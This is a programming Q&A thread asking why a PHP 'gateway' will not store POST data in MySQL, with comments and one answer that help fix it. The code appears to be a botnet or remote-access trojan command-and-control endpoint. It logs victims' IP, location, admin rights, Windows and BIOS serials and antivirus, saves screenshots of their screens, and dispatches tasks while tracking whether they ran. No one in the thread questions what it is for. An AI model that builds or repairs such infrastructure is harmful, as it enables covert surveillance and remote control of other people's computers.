# Making a PHP gateway work

Tags: php, html, mysql, sql

I've got a program that sends a POST-request to a PHP-page. The PHP-page
is supposed to receive the request and write it to the SQL database (this credentials are configured properly). However I cannot seem to get it to work. Can someone help me out?

An example of an incoming POST request:

```
  Array
    (
    [usn] => Gregory
    [guid] => {c88cxfp3-6bdb-21p7-01fo-499x99dw6963}
    [cvr] => 1.0.1
    [cp] => DESKTOP-PX9A81H3
    [arch] => 64
    [win] => 2.6.2
    )
```

The code of the PHP gateway:

```
<?php
include_once("gdx/gdx.php");
include_once("gdx/internal.php");
include_once("gdx/utility.php");

function IsValidPOST($POST)
{
    if (!(
        isset($POST["cid"]) &&
        isset($POST["cvr"]) &&
        isset($POST["har"]) &&
        isset($POST["fip"]) &&
        isset($POST["wiv"]) &&
        isset($POST["osa"]) &&
        isset($POST["wsp"]) &&
        isset($POST["wed"]) &&
        isset($POST["wbi"]) &&
        isset($POST["wlg"]) &&
        isset($POST["wsr"]) &&
        isset($POST["wdr"]) &&
        isset($POST["pcn"]) &&
        isset($POST["usn"]) &&
        isset($POST["ltm"]) &&
        isset($POST["cmd"]) &&
        isset($POST["ctp"]) &&
        isset($POST["bio"]) &&
        isset($POST["bmn"]) &&
        isset($POST["bvs"]) &&
        isset($POST["bsn"]) &&
        isset($POST["cpu"]) &&
        isset($POST["cmn"]) &&
        isset($POST["car"]) &&
        isset($POST["npr"]) &&
        isset($POST["vda"]) &&
        isset($POST["vrs"]) &&
        isset($POST["vrr"]) &&
        isset($POST["hds"]) &&
        isset($POST["pms"]) &&
        isset($POST["dbw"]) &&
        isset($POST["alb"]) &&
        isset($POST["anf"]) &&
        isset($POST["jvm"]) &&
        isset($POST["avs"])
        ))
    {
        return false;
    }

    if( (strlen($POST["cid"]) == 32 && ctype_xdigit($POST["cid"])) && 
        is_numeric($POST["cvr"]) &&
        $POST["har"] == 1 || $POST["har"] == 0 &&
        is_numeric($POST["wiv"]) &&
        $POST["osa"] == 1 || $POST["osa"] == 0 &&
        is_numeric($POST["wsp"]) &&
        is_numeric($POST["wed"]) &&
        is_numeric($POST["wbi"]) &&
        is_numeric($POST["wlg"]) &&
        ctype_print($POST["wsr"]) &&
        ctype_print($POST["wdr"]) &&
        !preg_match("/\W/", $POST["pcn"]) &&
        !preg_match("/\W/", $POST["usn"]) &&
        is_numeric($POST["ltm"]) &&
        ctype_print($POST["cmd"]) &&
        is_numeric($POST["ctp"]) &&
        ctype_print($POST["bio"]) &&
        ctype_print($POST["bmn"]) &&
        ctype_print($POST["bvs"]) &&
        ctype_print($POST["bsn"]) &&
        ctype_print($POST["cpu"]) &&
        ctype_print($POST["cmn"]) &&
        is_numeric($POST["car"]) &&
        is_numeric($POST["npr"]) &&
        ctype_print($POST["vda"]) &&
        ctype_print($POST["vrs"]) &&
        ctype_print($POST["vrr"]) &&
        ctype_print($POST["hds"]) &&
        ctype_print($POST["pms"]) &&
        ctype_print($POST["dbw"]) &&
        ctype_print($POST["alb"]) &&
        ctype_print($POST["anf"]) &&
        ctype_print($POST["jvm"]) &&
        ctype_print($POST["avs"]) 
        )
    {
        return true;
    }

    return false;
}

if($_SERVER["REQUEST_METHOD"] !== "POST" || !isset($_SERVER["CONTENT_LENGTH"])) die();

try
{

$Host = MYSQL_HOST;
$Database = DATABASE_NAME;
$conn = new PDO("mysql:host=$Host;dbname=$Database", MYSQL_USER, MYSQL_PASSWORD);
$conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$QrSett = $conn->query("SELECT * FROM Settings");
$Sett = $QrSett->fetch(PDO::FETCH_ASSOC);

$_POST = array();
$ContentLength = $_SERVER["CONTENT_LENGTH"];
$Data = file_get_contents("php://input");
parse_str($Data, $_POST);

if (!isset($_POST["hdr"]) || (isset($_POST["hdr"]) != HEADER_CLIENT_NOTIFY 
    && isset($_POST["hdr"]) != HEADER_TASK_RESULT))
{
    die();
}

$Result = "";
$gdx = new GDX($conn);
$gdx->UpdateTasksExp();

if($_POST["hdr"] == HEADER_CLIENT_NOTIFY)
{
    //if(IsValidPOST($_POST))
    {
        $ClientId = $_POST["cid"];
        $ClientIdBin = pack('H*', $ClientId);
        $SzIPAddress = GetIPAddress();
        $IPAddress = inet_pton($SzIPAddress);
        $Location = $gdx->GetIPLocation($SzIPAddress);

        $SlPr = $conn->prepare("SELECT Id FROM Clients WHERE ClientId = ?");
        $SlPr->execute(array($ClientIdBin));
        $ClientIdAssoc = $SlPr->fetch(PDO::FETCH_ASSOC);

        if(!$ClientIdAssoc)
        {
            $sql = "INSERT INTO Clients (
                    ClientId , Version , IPAddress , Location , HasAdminRigths , FilePath , 
                    InstallationDate , LastCheck , OperatingSystem , OSArchitecture , ServipackVersion , 
                    WindowsEdition , WindowsBuildId , WindowsLang , WindowsSerial , WindowsDir , 
                    PCName , UserName , PCLocalTime , ComputerModel , ComputerType , 
                    BIOSName , BIOSManufacturer , BIOSVersion , BIOSSerialNumber , 
                    CPUName , CPUManufacturer , CPUArquitecture, CPUNumberProcessors , 
                    VideoAdapter , VideoResolution , VideoRefreshRate , 
                    HardDrives , PhysicalMemories , DefaultBrowser , InstalledBrowsers , 
                    InstalledNETFrameworks , JAVAVM , Antivirus ) 
                    VALUES (:ClientId , :Version , :IPAddress , :Location , :HasAdminRigths , :FilePath , 
                    :InstallationDate , :LastCheck , :OperatingSystem , :OSArchitecture , :ServipackVersion , 
                    :WindowsEdition , :WindowsBuildId , :WindowsLang , :WindowsSerial , :WindowsDir , 
                    :PCName , :UserName , :PCLocalTime , :ComputerModel , :ComputerType , 
                    :BIOSName , :BIOSManufacturer , :BIOSVersion , :BIOSSerialNumber , 
                    :CPUName , :CPUManufacturer , :CPUArquitecture , :CPUNumberProcessors , 
                    :VideoAdapter , :VideoResolution , :VideoRefreshRate , 
                    :HardDrives , :PhysicalMemories , :DefaultBrowser , :InstalledBrowsers , 
                    :InstalledNETFrameworks , :JAVAVM , :Antivirus )";

            $InPr = $conn->prepare($sql);

            $InPr->execute(array(":ClientId" => $ClientIdBin, ":Version" => $_POST["cvr"],
                ":IPAddress" => $IPAddress, ":Location" => $Location,
                ":HasAdminRigths" => $_POST["har"], ":FilePath" => $_POST["fip"],
                ":InstallationDate" => $GdxCurrentTime, ":LastCheck" => $GdxCurrentTime,
                ":OperatingSystem" => $_POST["wiv"], ":OSArchitecture" => $_POST["osa"],
                ":ServipackVersion" => $_POST["wsp"], ":WindowsEdition" => $_POST["wed"],
                ":WindowsBuildId" => $_POST["wbi"], ":WindowsLang" => $_POST["wlg"],
                ":WindowsSerial" => $_POST["wsr"], ":WindowsDir" => $_POST["wdr"],
                ":PCName" => $_POST["pcn"], ":UserName" => $_POST["usn"],
                ":PCLocalTime" => $_POST["ltm"], ":ComputerModel" => $_POST["cmd"],
                ":ComputerType" => $_POST["ctp"], ":BIOSName" => $_POST["bio"],
                ":BIOSManufacturer" => $_POST["bmn"], ":BIOSVersion" => $_POST["bvs"],
                ":BIOSSerialNumber" => $_POST["bsn"], ":CPUName" => $_POST["cpu"],
                ":CPUManufacturer" => $_POST["cmn"], ":CPUArquitecture" => $_POST["car"],
                ":CPUNumberProcessors" => $_POST["npr"], ":VideoAdapter" => $_POST["vda"],
                ":VideoResolution" => $_POST["vrs"], ":VideoRefreshRate" => $_POST["vrr"],
                ":HardDrives" => $_POST["hds"], ":PhysicalMemories" => $_POST["pms"],
                ":DefaultBrowser" => $_POST["dbw"], ":InstalledBrowsers" => $_POST["alb"],
                ":InstalledNETFrameworks" => $_POST["anf"], ":JAVAVM" => $_POST["jvm"],
                ":Antivirus" => $_POST["avs"]
                ));
        }
        else
        {
            $sql = "UPDATE Clients SET
                    ClientId = :ClientId, Version = :Version, IPAddress = :IPAddress, 
                    Location = :Location, HasAdminRigths = :HasAdminRigths, FilePath = :FilePath, 
                    LastCheck = :LastCheck, OperatingSystem = :OperatingSystem, 
                    OSArchitecture = :OSArchitecture, ServipackVersion = :ServipackVersion, 
                    WindowsEdition = :WindowsEdition, WindowsBuildId = :WindowsBuildId, 
                    WindowsLang = :WindowsLang, WindowsSerial = :WindowsSerial, WindowsDir = :WindowsDir, 
                    PCName = :PCName, UserName = :UserName, PCLocalTime = :PCLocalTime, 
                    ComputerModel = :ComputerModel, ComputerType = :ComputerType, 
                    BIOSName = :BIOSName, BIOSManufacturer = :BIOSManufacturer, BIOSVersion = :BIOSVersion, 
                    BIOSSerialNumber = :BIOSSerialNumber, CPUName = :CPUName, 
                    CPUManufacturer = :CPUManufacturer, CPUArquitecture = :CPUArquitecture, 
                    CPUNumberProcessors = :CPUNumberProcessors, 
                    VideoAdapter = :VideoAdapter, VideoResolution = :VideoResolution, 
                    VideoRefreshRate = :VideoRefreshRate, HardDrives = :HardDrives, 
                    PhysicalMemories = :PhysicalMemories, DefaultBrowser = :DefaultBrowser, 
                    InstalledBrowsers = :InstalledBrowsers, 
                    InstalledNETFrameworks = :InstalledNETFrameworks, JAVAVM = :JAVAVM, 
                    Antivirus = :Antivirus WHERE Id = :Id";

            $InPr = $conn->prepare($sql);

            $Id = $ClientIdAssoc["Id"];
            $InPr->execute(array(":ClientId" => $ClientIdBin, ":Version" => $_POST["cvr"],
                ":IPAddress" => $IPAddress, ":Location" => $Location,
                ":HasAdminRigths" => $_POST["har"], ":FilePath" => $_POST["fip"],
                ":LastCheck" => $GdxCurrentTime, ":OperatingSystem" => $_POST["wiv"], 
                ":OSArchitecture" => $_POST["osa"], ":ServipackVersion" => $_POST["wsp"], 
                ":WindowsEdition" => $_POST["wed"], ":WindowsBuildId" => $_POST["wbi"], 
                ":WindowsLang" => $_POST["wlg"], ":WindowsSerial" => $_POST["wsr"], 
                ":WindowsDir" => $_POST["wdr"], ":PCName" => $_POST["pcn"], ":UserName" => $_POST["usn"],
                ":PCLocalTime" => $_POST["ltm"], ":ComputerModel" => $_POST["cmd"],
                ":ComputerType" => $_POST["ctp"], ":BIOSName" => $_POST["bio"],
                ":BIOSManufacturer" => $_POST["bmn"], ":BIOSVersion" => $_POST["bvs"],
                ":BIOSSerialNumber" => $_POST["bsn"], ":CPUName" => $_POST["cpu"],
                ":CPUManufacturer" => $_POST["cmn"], ":CPUArquitecture" => $_POST["car"],
                ":CPUNumberProcessors" => $_POST["npr"], ":VideoAdapter" => $_POST["vda"],
                ":VideoResolution" => $_POST["vrs"], ":VideoRefreshRate" => $_POST["vrr"],
                ":HardDrives" => $_POST["hds"], ":PhysicalMemories" => $_POST["pms"],
                ":DefaultBrowser" => $_POST["dbw"], ":InstalledBrowsers" => $_POST["alb"],
                ":InstalledNETFrameworks" => $_POST["anf"], ":JAVAVM" => $_POST["jvm"],
                ":Antivirus" => $_POST["avs"], ":Id" => $Id
                ));
        }

        if(isset($_POST["src"])) {
            $ImgBytes = pack('H*', $_POST["src"]);
            if(chmod("screenshots", 0777))
            {
                $Image = fopen("screenshots/" . $ClientId . ".jpeg", "w");
                if($Image) {
                    fwrite($Image, $ImgBytes);
                    fclose($Image);
                }
                chmod("screenshots", 0755);
            }
        }

        $Result = $gdx->LookupTask($conn, $ClientId);
    }
}
else if($_POST["hdr"] == HEADER_TASK_RESULT)
{
    if (isset($_POST["tid"]) &&
        isset($_POST["cid"]) &&
        isset($_POST["trs"]) &&
        strlen($_POST["tid"]) == 32 && ctype_xdigit($_POST["tid"]) &&
        strlen($_POST["cid"]) == 32 && ctype_xdigit($_POST["cid"]) &&
        (is_numeric($_POST["trs"]) && ($_POST["trs"] == "1" || $_POST["trs"] == "0"))
        )
    {
        $TaskIdBin = pack('H*', $_POST["tid"]);
        $ClientIdBin = pack('H*', $_POST["cid"]);
        $Status = $_POST["trs"];

        $sql = "SELECT Status FROM TasksCompleted WHERE TaskId = :TaskId AND ClientId = :ClientId";
        $SlPr = $conn->prepare($sql);
        $SlPr->execute(array("TaskId" => $TaskIdBin, "ClientId" => $ClientIdBin));
        $TaskStatus = $SlPr->fetch(PDO::FETCH_ASSOC);

        if($TaskStatus["Status"] == TASK_CMPLD_SENT)
        {
            $Status = ($Status) ? TASK_CMPLD_EXECUTED : TASK_CMPLD_FAILED;

            $sql = "UPDATE TasksCompleted SET Status = :Status WHERE TaskId = :TaskId AND ClientId = :ClientId";
            $SlPr = $conn->prepare($sql);
            $SlPr->execute(array("Status" => $Status, "TaskId" => $TaskIdBin, "ClientId" => $ClientIdBin));

            if($Status == TASK_CMPLD_EXECUTED) {
                $sql = "UPDATE Tasks SET ClientsExecuted = ClientsExecuted + 1 WHERE TaskId = :TaskId";
                $SlPr = $conn->prepare($sql);
                $SlPr->execute(array("TaskId" => $TaskIdBin));
            }
            else {
                $sql = "UPDATE Tasks SET ClientsFailed = ClientsFailed + 1 WHERE TaskId = TaskId";
                $SlPr = $conn->prepare($sql);
                $SlPr->execute(array("TaskId" => $TaskIdBin));
            }
        }
    }
}

$conn = null;
} catch(PDOException $e) {
    echo $e->getMessage();
}

echo $Result;
?>
```

Comment: I think it must be $_POST not just $POST

Comment: That is not the problem

Comment: The question "Why isn't my code working?" is off topic for this site. If you can provide some sort of error message or closer hint to a specific problem, then I think you'll have much better luck getting an answer.

Comment: For debuggin echo that code in php and run directly on phpmysqmin sql tab to see the problem

Comment: @ChannaveerHakari A function parameter can be named pretty much whatever you want.

Answer (score 0):

The problem was that the MySQL database refused the data since it wasn't filling every field in the column/table, however it's named. So when removing the unnecessary columns/tables (the one most far from the database, lets say it like that) it actually accepted the data without problems.